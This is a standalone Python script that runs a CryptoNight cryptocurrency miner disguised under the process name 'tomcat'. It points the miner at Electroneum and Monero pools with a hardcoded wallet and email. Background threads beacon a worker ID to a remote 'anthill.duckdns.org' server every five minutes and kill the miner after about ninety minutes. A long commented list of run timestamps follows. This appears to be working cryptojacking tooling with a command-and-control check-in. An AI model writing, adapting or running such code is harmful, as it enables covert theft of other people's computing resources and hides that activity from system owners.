import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:24:07.570172
#2018-02-17 17:12:02.035590
#2018-02-17 19:00:10.988907
#2018-02-17 20:49:01.826487
#2018-02-17 22:36:07.898836
#2018-02-18 00:20:06.421166
#2018-02-18 02:11:06.312533
#2018-02-18 03:58:07.025453
#2018-02-18 05:48:01.300568
#2018-02-18 07:40:02.976294
#2018-02-18 09:27:05.977956
#2018-02-18 11:13:06.087944
#2018-02-18 13:00:06.774693
#2018-02-18 14:50:01.275054
#2018-02-18 16:37:06.183436
#2018-02-18 18:25:06.900945
#2018-02-18 20:12:07.332200
#2018-02-18 21:59:04.375743
#2018-02-18 23:48:06.122001
#2018-02-19 01:35:04.066670
#2018-02-19 03:23:01.240549
#2018-02-19 05:08:04.496360
#2018-02-19 06:54:02.157045
#2018-02-19 08:42:07.655827
#2018-02-19 10:31:04.716486
#2018-02-19 12:19:06.012614
#2018-02-19 14:06:06.917910
#2018-02-19 15:54:08.806733
#2018-02-19 17:43:02.080050
#2018-02-19 19:33:01.214526
#2018-02-19 21:20:09.594028
#2018-02-19 23:05:07.197418
#2018-02-20 00:48:07.568608
#2018-02-20 02:34:07.433830
#2018-02-20 04:24:06.555327
#2018-02-20 06:08:01.312152
#2018-02-20 07:52:07.719306
#2018-02-20 09:38:02.081633
#2018-02-20 11:22:02.184398
#2018-02-20 13:09:08.899333
#2018-02-20 14:54:01.832168
#2018-02-20 16:40:04.578829
#2018-02-20 18:26:08.392841
#2018-02-20 20:18:03.949734
#2018-02-20 22:03:03.770946
#2018-02-20 23:43:07.148524
#2018-02-21 01:28:05.728014
#2018-02-21 03:16:08.113176
#2018-02-21 05:05:05.595817
#2018-02-21 06:52:10.063081
#2018-02-21 08:38:07.227057
#2018-02-21 10:24:07.696903
#2018-02-21 12:12:03.112992
#2018-02-21 14:00:12.603045
#2018-02-21 15:46:01.781216
#2018-02-21 17:38:05.455763
#2018-02-21 19:25:01.358114
#2018-02-21 21:14:05.878678
#2018-02-21 23:01:08.019706
#2018-02-22 00:49:07.491345
#2018-02-22 02:37:01.581089
#2018-02-22 04:23:02.145777
#2018-02-22 06:11:06.440566
#2018-02-22 07:55:06.930112
#2018-02-22 09:43:07.786581
#2018-02-22 11:28:07.957746
#2018-02-22 13:13:09.179634
#2018-02-22 15:03:09.877901
#2018-02-22 16:46:05.787257
#2018-02-22 18:32:01.845852
#2018-02-22 20:24:01.339739
#2018-02-22 22:10:10.842809
#2018-02-22 23:57:07.641817
#2018-02-23 01:46:07.536041
#2018-02-23 03:33:07.727859
#2018-02-23 05:17:06.455298
#2018-02-23 07:03:04.290328
#2018-02-23 08:51:04.397253
#2018-02-23 11:11:08.970487
#2018-02-23 13:07:01.859223
#2018-02-23 14:52:05.877980
#2018-02-23 16:40:10.422367
#2018-02-23 18:26:02.044029
#2018-02-23 20:10:08.972480
#2018-02-23 21:59:05.231941
#2018-02-23 23:48:08.002185
#2018-02-24 01:39:08.308402
#2018-02-24 03:29:05.441139
#2018-02-24 05:14:06.583910
#2018-02-24 07:02:06.328062
#2018-02-24 08:34:07.512783
#2018-02-24 10:07:01.319166
#2018-02-24 11:52:05.111289
#2018-02-24 13:19:02.211274
#2018-02-24 14:53:04.739328
#2018-02-24 16:26:06.022739
#2018-02-24 18:02:01.438472
#2018-02-24 19:32:06.296197
#2018-02-24 21:08:06.847278
#2018-02-24 23:11:06.388299
#2018-02-25 01:32:04.973568
#2018-02-25 05:00:07.636630
#2018-02-25 09:43:01.518521